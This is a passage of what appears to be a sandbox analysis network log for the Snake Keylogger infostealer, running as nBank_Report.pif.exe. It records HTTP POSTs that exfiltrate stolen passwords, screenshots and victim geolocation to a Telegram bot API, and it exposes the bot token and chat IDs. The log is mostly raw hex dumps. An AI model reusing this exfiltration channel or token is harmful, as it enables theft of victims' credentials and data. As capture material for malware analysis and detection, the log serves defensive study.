                                              2024-09-26 09:34:43 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:43 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:45 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:45 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              49192.168.2.1049778149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:45 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce6b48d37c51a
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:45 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 36 62 34 38 64 33 37 63 35 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dce6b48d37c51aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:46 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:46 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:46 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 38 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6361,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343286,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              50192.168.2.1049779149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:47 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce717d96f9c08
                                              Host: api.telegram.org
                                              Content-Length: 673762
                                              2024-09-26 09:34:47 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 31 37 64 39 36 66 39 63 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dce717d96f9c08Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:47 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:34:47 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:47 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:47 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:47 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:34:47 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:47 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:34:47 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:47 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:48 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:48 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              51192.168.2.1049780149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:49 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce7e93f309845
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:49 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 65 39 33 66 33 30 39 38 34 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dce7e93f309845Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:49 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:49 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:49 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 38 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6363,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343289,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              52192.168.2.1049781149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:50 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dcea1a8e34fdeb
                                              Host: api.telegram.org
                                              Content-Length: 673762
